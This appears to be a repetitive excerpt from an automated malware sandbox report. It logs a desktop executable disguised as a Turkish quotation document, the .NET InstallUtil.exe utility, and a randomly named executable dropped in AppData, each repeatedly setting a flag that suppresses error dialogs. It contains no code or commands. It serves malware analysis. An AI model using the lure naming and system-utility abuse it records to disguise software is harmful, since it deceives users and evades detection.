                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
